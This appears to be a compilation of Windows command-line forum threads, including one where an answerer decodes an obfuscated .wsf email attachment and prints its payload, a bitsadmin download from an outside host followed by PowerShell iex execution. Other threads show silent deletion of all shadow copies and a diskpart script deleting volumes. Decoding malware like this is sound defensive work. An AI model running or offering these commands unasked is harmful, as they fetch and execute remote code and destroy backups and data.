I tried to delete the vss shadow copies via cmd and it asks for a prompt y/n. How do I automatically answer yes?
This is the syntax:
echo y | vssadmin delete shadows /all > C:\Temp\VssDeleteDriveC.log
This is the result of the syntax entered:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? N
Related
this morning I received a mal containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!
The fact it obfuscates itself is a good indicator it maybe malicious, if you want to see what it's attempting to run you can;
Comment out this line (like below);
'ISUaUv.run KcSOUa,false,-1
Add this line below it;
WScript.Echo KcSOUa
When you run the script you will get this output;
Output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
I am new to programming and need some help.. I need to write a powershell script and as part of it it needs to run an external executable... However I am having issues with the script not asking for an argument and even if I pass one it just seems to wait without asking anything.. so here is the part in question
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
& $app $arg1 $arg2v
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
so the .exe is to clear volume shadow copies with a -da flag (clear all).. however the step requires a Y to continue.. this when I run from cmd.exe
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its doc says -da requires confirmation but does not provide a way to override. You might be able to pipe in the user input... Try this -
echo 'y' | cmd.exe /c vshadow.exe -da
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).
I want to make a bat file in windows when double click on that
it will delete all existing partion even C drive from the computer.
Means it will make the hardisk Empty.
Plz suggest me process.
How to do this.
Thanks in advance
http://www.dban.org/ has a tool to nuke all drives.
A script to do so can be misused...
You cannot delete or format the system and boot partitions from a running Windows. All other partitions can be deleted or formatted using diskpart with a script, e.g.:
C:\>type script.txt
select volume 3
delete volume
exit
C:\>diskpart /s script.txt
Copyright (C) 1999-2008 Microsoft Corporation.
On computer: FOOBAR
Volume 3 is the selected volume.
DiskPart successfully deleted the volume.
Leaving DiskPart...
Is it possible to create a desktop shortcut that, when pressed, will open command prompt and run a pre-defined command?
Create A Shortcut That Opens The Command Prompt & Runs A Command:
Yes! You can create a shortcut to cmd.exe with a command specified after it. Alternatively you could create a batch script, if your goal is just to have a clickable way to run commands.
Steps:
Right click on some empty space in Explorer, and in the context menu go to "New/Shortcut".
When prompted to enter a location put either:
"C:\Windows\System32\cmd.exe /k your-command" This will run the command and keep (/k) the command prompt open after.
or
"C:\Windows\System32\cmd.exe /c your-command" This will run the command and the close (/c) the command prompt.
Notes:
Tested, and working on Windows 8 - Core X86-64 September 12 2014
If you want to have more than one command, place an "&" symbol in between them. For example: "C:\Windows\System32\cmd.exe /k command1 & command2".
Yes, make the shortcut's path
%comspec% /k <command>
where
%comspec% is the environment variable for cmd.exe's full path, equivalent to C:\Windows\System32\cmd.exe on most (if not all) Windows installs
/k keeps the window open after the command has run, this may be replaced with /c if you want the window to close once the command is finished running
<command> is the command you wish to run
The solutions turned out to be very simple.
Open text edit
Write the command, save as .bat.
Double click the file created and the command automatically starts running in command-prompt.
Create new text file on desktop;
Enter desired commands in text file;
Rename extension of text file from ".txt" --> ".bat"
Yes. One option you have is to create a batch file containing the command
cmd -c {your command}
or
cmd -k {your command}
The shortcut will then be to this batch file.
This is an old post but I have issues with coming across posts that have some incorrect information/syntax...
If you wanted to do this with a shorcut icon you could just create a shortcut on your desktop for the cmd.exe application. Then append a /K {your command} to the shorcut path.
So a default shorcut target path may look like "%windir%\system32\cmd.exe", just change it to %windir%\system32\cmd.exe /k {commands}
example: %windir%\system32\cmd.exe /k powercfg -lastwake
In this case i would use /k (keep open) to display results.
Arlen was right about the /k (keep open) and /c (close)
You can open a command prompt and type "cmd /?" to see your options.
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/cmd.mspx?mfr=true
A batch file is kind of overkill for a single command prompt command...
Hope this helps someone else
I tried this, all it did was open a cmd prompt with "cmd -c (my command)"
and didn't actually run it. see below.
C:\windows\System32>cmd -c (powercfg /lastwake)
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\windows\System32>
***Update
I changed my .bat file to read "cmd /k (powercfg /lastwake)" and it worked.
You can also leave out the () and it works too.
You can also create a shortcut on desktop that can run a specific command or even a batch file by just typing the command in "Type the Location of Item" bar in create shortcut wizard
Right click on Desktop.
Enter the command in "Type the Location of Item" bar.
Double click the shortcut to run the command.
Found detailed Instructions here
Using the Drag and Drop method
From the windows search bar type in cmd to pull up the windows bar operation.
When the command line option is shown, right click it and select Open File Location.
The file explorer opens and the shortcut link is highlighted in the folder. If it is not highlighted, then select it.
Hold down the Control key and using the mouse drag the shortcut to the desktop. If you don't see Copy to Desktop while dragging and before dropping, then push down and hold the Control key until you see the message.
Drop the link on the desktop.
Change properties as needed.
How do I change the message that comes up automaticly when I start up CMD? The one where it says:"
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation.
How do I change that automatic message?..
By editing the cmd.exe. :) (That was a joke btw, don't really try that) If you look at a the cmd.exe in a hex editor, you will see that text in it. There is no easy way that I know of to change it.
Here is an ugly hack to emulate what you are wanting. First create a .cmd file that contains the following:
cmd /k init.bat
(cmd /k tells the computer to start an instance of cmd and run the parameter and not exit)
Then created your init.bat file with the following:
#echo off
cls
echo My message goes here
Then you just run your .cmd file instead of cmd.exe and you will get a command window with just your text at the top.
If I knew why you were wanting to do this, then maybe my answer could have been more specific to your needs.
You have to reverse engineer it :) Don't remember exactly how I did, but using a debugger single step until you find the place where it prints that out and edit it. I "hacked" it a bit more and it refuses doing anything, saying "do it yourself!" :)